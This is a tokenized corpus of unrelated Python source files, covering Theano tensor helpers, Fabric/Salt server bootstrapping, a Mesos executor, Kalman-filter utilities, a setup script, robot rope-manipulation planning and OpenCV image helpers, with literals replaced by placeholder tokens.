( sequences , masks , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> sequences = tensor . as_tensor_variable ( sequences ) <EOL> masks = tensor . as_tensor_variable ( masks ) <EOL> image = sequences . dimshuffle ( '<STR_LIT:x>' , '<STR_LIT:x>' , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> filters = masks . dimshuffle ( <NUM_LIT:0> , '<STR_LIT:x>' , '<STR_LIT:x>' , <NUM_LIT:1> ) <EOL> result = conv2d ( image , filters , ** kwargs ) <EOL> result = result . dimshuffle ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:0> ) <EOL> return result . reshape ( result . shape [ : - <NUM_LIT:1> ] , ndim = <NUM_LIT:3> ) <EOL> def pad_to_a_multiple ( tensor_ , k , pad_with ) : <EOL> """<STR_LIT>""" <EOL> new_length = ( <EOL> tensor . ceil ( tensor_ . shape [ <NUM_LIT:0> ] . astype ( '<STR_LIT>' ) / k ) * k ) . astype ( '<STR_LIT>' ) <EOL> new_shape = tensor . set_subtensor ( tensor_ . shape [ : <NUM_LIT:1> ] , new_length ) <EOL> canvas = tensor . alloc ( pad_with , tensor . prod ( new_shape ) ) . reshape ( <EOL> new_shape , ndim = tensor_ . ndim ) <EOL> return tensor . set_subtensor ( canvas [ : tensor_ . shape [ <NUM_LIT:0> ] ] , tensor_ ) </s>
<s> import time <EOL> from fabric . api import env , run , sudo <EOL> from fabric . context_managers import settings as fabric_settings <EOL> from fabric . contrib . files import append , comment , sed , uncomment <EOL> from fabric . operations import reboot <EOL> import settings <EOL> DISTRO = "<STR_LIT>" <EOL> SALT_INSTALLERS = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> def bootstrap ( ) : <EOL> """<STR_LIT>""" <EOL> base_packages = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> run ( "<STR_LIT>" ) <EOL> run ( "<STR_LIT>" ) <EOL> append ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> run ( "<STR_LIT>" ) <EOL> run ( "<STR_LIT>" ) <EOL> run ( "<STR_LIT>" . format ( pkgs = "<STR_LIT:U+0020>" . join ( base_packages ) ) ) <EOL> append ( "<STR_LIT>" , "<STR_LIT>" . format ( env . master_server . private_ip ) ) <EOL> uncomment ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> comment ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> with fabric_settings ( warn_only = True ) : <EOL> reboot ( ) <EOL> def install_salt ( installer = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> if installer == "<STR_LIT>" : <EOL> run ( "<STR_LIT>" ) <EOL> elif installer == "<STR_LIT>" : <EOL> run ( "<STR_LIT>" ) <EOL> else : <EOL> raise NotImplementedError ( ) <EOL> def setup_salt ( ) : <EOL> """<STR_LIT>""" <EOL> server = [ s for s in env . bootmachine_servers if s . public_ip == env . host ] [ <NUM_LIT:0> ] <EOL> if env . host == env . master_server . public_ip : <EOL> append ( "<STR_LIT>" , "<STR_LIT>" . format ( <EOL> settings . REMOTE_STATES_DIR ) ) <EOL> append ( "<STR_LIT>" , "<STR_LIT>" . format ( <EOL> settings . REMOTE_PILLARS_DIR ) ) <EOL> run ( "<STR_LIT>" ) <EOL> sed ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" . format ( env . master_server . private_ip ) ) <EOL> sed ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" . format ( server . name ) ) <EOL> append ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for role in server . roles : <EOL> append ( "<STR_LIT>" , "<STR_LIT>" . format ( role ) ) <EOL> run ( "<STR_LIT>" ) <EOL> run ( "<STR_LIT>" ) <EOL> def start_salt ( ) : <EOL> """<STR_LIT>""" <EOL> with fabric_settings ( warn_only = True ) : <EOL> if env . host == env . master_server . public_ip : <EOL> sudo ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:3> ) <EOL> sudo ( "<STR_LIT>" ) <EOL> def stop_salt ( ) : <EOL> """<STR_LIT>""" <EOL> with fabric_settings ( warn_only = True ) : <EOL> if env . host == env . master_server . public_ip : <EOL> sudo ( "<STR_LIT>" ) <EOL> sudo ( "<STR_LIT>" ) <EOL> def restart_salt ( ) : <EOL> """<STR_LIT>""" <EOL> stop_salt ( ) <EOL> start_salt ( ) </s>
<s> from __future__ import print_function <EOL> import site <EOL> site . addsitedir ( '<STR_LIT>' ) <EOL> site . addsitedir ( '<STR_LIT>' ) <EOL> import sys <EOL> import time <EOL> from threading import Thread <EOL> from mesos . interface import Executor , mesos_pb2 <EOL> from mesos . native import MesosExecutorDriver <EOL> class MinimalExecutor ( Executor ) : <EOL> def launchTask ( self , driver , task ) : <EOL> def run_task ( ) : <EOL> update = mesos_pb2 . TaskStatus ( ) <EOL> update . task_id . value = task . task_id . value <EOL> update . state = mesos_pb2 . TASK_RUNNING <EOL> driver . sendStatusUpdate ( update ) <EOL> print ( task . data ) <EOL> time . sleep ( <NUM_LIT:30> ) <EOL> update = mesos_pb2 . TaskStatus ( ) <EOL> update . task_id . value = task . task_id . value <EOL> update . state = mesos_pb2 . TASK_FINISHED <EOL> driver . sendStatusUpdate ( update ) <EOL> thread = Thread ( target = run_task , args = ( ) ) <EOL> thread . start ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> driver = MesosExecutorDriver ( MinimalExecutor ( ) ) <EOL> sys . exit ( <NUM_LIT:0> if driver . run ( ) == mesos_pb2 . DRIVER_STOPPED else <NUM_LIT:1> ) </s>
<s> """<STR_LIT>""" <EOL> from numpy import array , asarray , isscalar , eye , dot <EOL> from functools import reduce <EOL> def dot3 ( A , B , C ) : <EOL> """<STR_LIT>""" <EOL> return dot ( A , dot ( B , C ) ) <EOL> def dot4 ( A , B , C , D ) : <EOL> """<STR_LIT>""" <EOL> return dot ( A , dot ( B , dot ( C , D ) ) ) <EOL> def dotn ( * args ) : <EOL> """<STR_LIT>""" <EOL> return reduce ( dot , args ) <EOL> def runge_kutta4 ( y , x , dx , f ) : <EOL> """<STR_LIT>""" <EOL> k1 = dx * f ( y , x ) <EOL> k2 = dx * f ( y + <NUM_LIT:0.5> * k1 , x + <NUM_LIT:0.5> * dx ) <EOL> k3 = dx * f ( y + <NUM_LIT:0.5> * k2 , x + <NUM_LIT:0.5> * dx ) <EOL> k4 = dx * f ( y + k3 , x + dx ) <EOL> return y + ( k1 + <NUM_LIT:2> * k2 + <NUM_LIT:2> * k3 + k4 ) / <NUM_LIT> <EOL> def setter ( value , dim_x , dim_y ) : <EOL> """<STR_LIT>""" <EOL> v = array ( value , dtype = float ) <EOL> if v . shape != ( dim_x , dim_y ) : <EOL> raise Exception ( '<STR_LIT>' . format ( dim_x , dim_y ) ) <EOL> return v <EOL> def setter_1d ( value , dim_x ) : <EOL> """<STR_LIT>""" <EOL> v = array ( value , dtype = float ) <EOL> shape = v . shape <EOL> if shape [ <NUM_LIT:0> ] != ( dim_x ) or v . ndim > <NUM_LIT:2> or ( v . ndim == <NUM_LIT:2> and shape [ <NUM_LIT:1> ] != <NUM_LIT:1> ) : <EOL> raise Exception ( '<STR_LIT>' . format ( shape , dim_x , <NUM_LIT:1> ) ) <EOL> return v <EOL> def setter_scalar ( value , dim_x ) : <EOL> """<STR_LIT>""" <EOL> if isscalar ( value ) : <EOL> v = eye ( dim_x ) * value <EOL> else : <EOL> v = array ( value , dtype = float ) <EOL> dim_x = v . shape [ <NUM_LIT:0> ] <EOL> if v . shape != ( dim_x , dim_x ) : <EOL> raise Exception ( '<STR_LIT>' . format ( dim_x , dim_x ) ) <EOL> return v </s>
<s> """<STR_LIT>""" <EOL> from numpy import array , asarray , dot , ones , outer , sum , zeros <EOL> class MMAEFilterBank ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filters , p , dim_x , H = None ) : <EOL> """<STR_LIT>""" <EOL> assert len ( filters ) == len ( p ) <EOL> assert dim_x > <NUM_LIT:0> <EOL> self . filters = filters <EOL> self . p = asarray ( p ) <EOL> self . dim_x = dim_x <EOL> self . _x = None <EOL> @ property <EOL> def x ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _x <EOL> @ property <EOL> def P ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _P <EOL> def predict ( self , u = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> for f in self . filters : <EOL> f . predict ( u ) <EOL> def update ( self , z , R = None , H = None ) : <EOL> """<STR_LIT>""" <EOL> for i , f in enumerate ( self . filters ) : <EOL> f . update ( z , R , H ) <EOL> self . p [ i ] *= f . likelihood <EOL> self . p /= sum ( self . p ) <EOL> self . _P = zeros ( self . filters [ <NUM_LIT:0> ] . P . shape ) <EOL> is_row_vector = ( self . filters [ <NUM_LIT:0> ] . x . ndim == <NUM_LIT:1> ) <EOL> if is_row_vector : <EOL> self . _x = zeros ( self . dim_x ) <EOL> for f , p in zip ( self . filters , self . p ) : <EOL> self . _x += dot ( f . x , p ) <EOL> else : <EOL> self . _x = zeros ( ( self . dim_x , <NUM_LIT:1> ) ) <EOL> for f , p in zip ( self . filters , self . p ) : <EOL> self . _x = zeros ( ( self . dim_x , <NUM_LIT:1> ) ) <EOL> self . _x += dot ( f . x , p ) <EOL> for x , f , p in zip ( self . _x , self . filters , self . p ) : <EOL> y = f . x - x <EOL> self . _P += p * ( outer ( y , y ) + f . P ) </s>
<s> from setuptools import setup , find_packages <EOL> from codecs import open <EOL> from os import path <EOL> import filterpy <EOL> here = path . abspath ( path . dirname ( __file__ ) ) <EOL> with open ( path . join ( here , '<STR_LIT>' ) , encoding = '<STR_LIT:utf-8>' ) as f : <EOL> long_description = f . read ( ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = filterpy . __version__ , <EOL> description = '<STR_LIT>' , <EOL> long_description = long_description , <EOL> url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> keywords = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' ] ) , <EOL> install_requires = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> package_data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } , <EOL> ) </s>
<s> from __future__ import division <EOL> import numpy as np <EOL> from lfd . environment import simulation_object <EOL> from lfd . mmqe . search import beam_search <EOL> from lfd . rapprentice . knot_classifier import isKnot as is_knot <EOL> class ActionSelection ( object ) : <EOL> def __init__ ( self , registration_factory ) : <EOL> """<STR_LIT>""" <EOL> self . registration_factory = registration_factory <EOL> def plan_agenda ( self , scene_state ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> class GreedyActionSelection ( ActionSelection ) : <EOL> def plan_agenda ( self , scene_state , timestep ) : <EOL> action2q_value = self . registration_factory . batch_cost ( scene_state ) <EOL> q_values , agenda = zip ( * sorted ( [ ( q_value , action ) for ( action , q_value ) in action2q_value . items ( ) ] ) ) <EOL> return ( agenda , q_values ) , False <EOL> class FeatureActionSelection ( ActionSelection ) : <EOL> def __init__ ( self , registration_factory , features , actions , demos , <EOL> width , depth , simulator = None , lfd_env = None ) : <EOL> self . features = features <EOL> self . actions = actions . keys ( ) <EOL> self . demos = demos <EOL> self . width = width <EOL> self . depth = depth <EOL> self . transferer = simulator <EOL> self . lfd_env = lfd_env <EOL> super ( FeatureActionSelection , self ) . __init__ ( registration_factory ) <EOL> def plan_agenda ( self , scene_state , timestep ) : <EOL> def evaluator ( state , ts ) : <EOL> try : <EOL> score = np . dot ( self . features . features ( state , timestep = ts ) , self . features . weights ) + self . features . w0 <EOL> except : <EOL> return - np . inf * np . r_ [ np . ones ( len ( self . features . weights ) ) ] <EOL> return score <EOL> def simulate_transfer ( state , action , next_state_id ) : <EOL> aug_traj = self . transferer . transfer ( self . demos [ action ] , state , plotting = False ) <EOL> self . lfd_env . execute_augmented_trajectory ( aug_traj , step_viewer = <NUM_LIT:0> ) <EOL> result_state = self . lfd_env . observe_scene ( ) <EOL> for sim_obj in self . lfd_env . sim . sim_objs : <EOL> if isinstance ( sim_obj , simulation_object . RopeSimulationObject ) : <EOL> rope_sim_obj = sim_obj <EOL> break <EOL> rope_knot = is_knot ( rope_sim_obj . rope . GetControlPoints ( ) ) <EOL> return ( result_state , next_state_id , rope_knot ) <EOL> return beam_search ( scene_state , timestep , self . features . src_ctx . seg_names , simulate_transfer , <EOL> evaluator , self . lfd_env . sim , width = self . width , <EOL> depth = self . depth ) </s>
<s> import cv2 , numpy as np <EOL> class Colors : <EOL> RED = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:255> ) <EOL> GREEN = ( <NUM_LIT:0> , <NUM_LIT:255> , <NUM_LIT:0> ) <EOL> BLUE = ( <NUM_LIT:255> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> class ClickGetter : <EOL> xy = None <EOL> done = False <EOL> def callback ( self , event , x , y , _flags , _param ) : <EOL> if self . done : <EOL> return <EOL> elif event == cv2 . EVENT_LBUTTONDOWN : <EOL> self . xy = ( x , y ) <EOL> self . done = True <EOL> def get_click ( windowname , img ) : <EOL> cg = ClickGetter ( ) <EOL> cv2 . setMouseCallback ( windowname , cg . callback ) <EOL> while not cg . done : <EOL> cv2 . imshow ( windowname , img ) <EOL> cv2 . waitKey ( <NUM_LIT:10> ) <EOL> return cg . xy <EOL> def draw_img ( img , colormap = None , min_size = <NUM_LIT:1> ) : <EOL> if img . dtype == np . bool : <EOL> img = img . astype ( '<STR_LIT>' ) <EOL> if img . dtype == np . float32 or img . dtype == np . float64 : <EOL> img = img . astype ( "<STR_LIT>" ) <EOL> minval = img . min ( ) <EOL> maxval = img . max ( ) <EOL> img = ( img - minval ) / ( maxval - minval ) <EOL> img = ( img * <NUM_LIT> ) . astype ( '<STR_LIT>' ) <EOL> if img . shape [ <NUM_LIT:0> ] < min_size : <EOL> ratio = int ( np . ceil ( float ( min_size ) / img . shape [ <NUM_LIT:0> ] ) ) <EOL> img = cv2 . resize ( img , ( img . shape [ <NUM_LIT:0> ] * ratio , img . shape [ <NUM_LIT:1> ] * ratio ) ) <EOL> if colormap is not None : <EOL> img = colormap [ img ] <EOL> cv2 . imshow ( "<STR_LIT>" , img ) <EOL> cv2 . waitKey ( ) <EOL> cv2 . destroyWindow ( "<STR_LIT>" ) <EOL> def tile_images ( imgs , nrows , ncols , row_titles = None , col_titles = None , max_width = <NUM_LIT:1000> ) : <EOL> assert nrows * ncols >= len ( imgs ) <EOL> if nrows * ncols > len ( imgs ) : <EOL> imgs = [ img for img in imgs ] <EOL> imgs . extend ( [ np . zeros_like ( imgs [ <NUM_LIT:0> ] ) for _ in xrange ( nrows * ncols - len ( imgs ) ) ] ) <EOL> full_width = imgs [ <NUM_LIT:0> ] . shape [ <NUM_LIT:1> ] * ncols <EOL> if full_width > max_width : <EOL> ratio = float ( max_width ) / full_width <EOL> for i in xrange ( len ( imgs ) ) : <EOL> imgs [ i ] = cv2 . resize ( imgs [ i ] , ( int ( imgs [ i ] . shape [ <NUM_LIT:1> ] * ratio ) , int ( imgs [ i ] . shape [ <NUM_LIT:0> ] * ratio ) ) ) <EOL> if col_titles is not None : raise NotImplementedError <EOL> imgrows = [ ] <EOL> for irow in xrange ( nrows ) : <EOL> rowimgs = imgs [ irow * ncols : ( irow + <NUM_LIT:1> ) * ncols ] <EOL> if row_titles is not None : <EOL> rowimgs [ <NUM_LIT:0> ] = rowimgs [ <NUM_LIT:0> ] . copy ( ) <EOL> cv2 . putText ( rowimgs [ <NUM_LIT:0> ] , row_titles [ irow ] , ( <NUM_LIT:10> , <NUM_LIT:10> ) , cv2 . FONT_HERSHEY_PLAIN , <NUM_LIT:1> , ( <NUM_LIT:255> , <NUM_LIT:255> , <NUM_LIT:0> ) , thickness = <NUM_LIT:1> ) <EOL> imgrows . append ( np . concatenate ( rowimgs , <NUM_LIT:1> ) ) <EOL> bigimg = np . concatenate ( imgrows , <NUM_LIT:0> ) <EOL> return bigimg <EOL> def label2rgb ( labels ) : <EOL> max_label = labels . max ( ) <EOL> rgbs = ( np . random . rand ( max_label + <NUM_LIT:1> , <NUM_LIT:3> ) * <NUM_LIT> ) . astype ( '<STR_LIT>' ) <EOL> return rgbs [ labels ] <EOL> def inttuple ( x , y ) : <EOL> return int ( np . round ( x ) ) , int ( np . round ( y ) ) <EOL> def circle_with_ori ( img , x , y , theta ) : <EOL> cv2 . circle ( img , inttuple ( x , y ) , <NUM_LIT> , ( <NUM_LIT:0> , <NUM_LIT:255> , <NUM_LIT:255> ) , <NUM_LIT:3> ) <EOL> cv2 . line ( img , inttuple ( x , y ) , inttuple ( x + <NUM_LIT> * np . cos ( theta ) , y + <NUM_LIT> * np . sin ( theta ) ) , ( <NUM_LIT:0> , <NUM_LIT:255> , <NUM_LIT:255> ) , <NUM_LIT:3> ) <EOL> CM_JET = np . array ( [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:255> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:8> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:12> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:16> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:20> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:32> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:64> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:100> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:255> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:5> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:8> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT:15> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ] , <EOL> [ 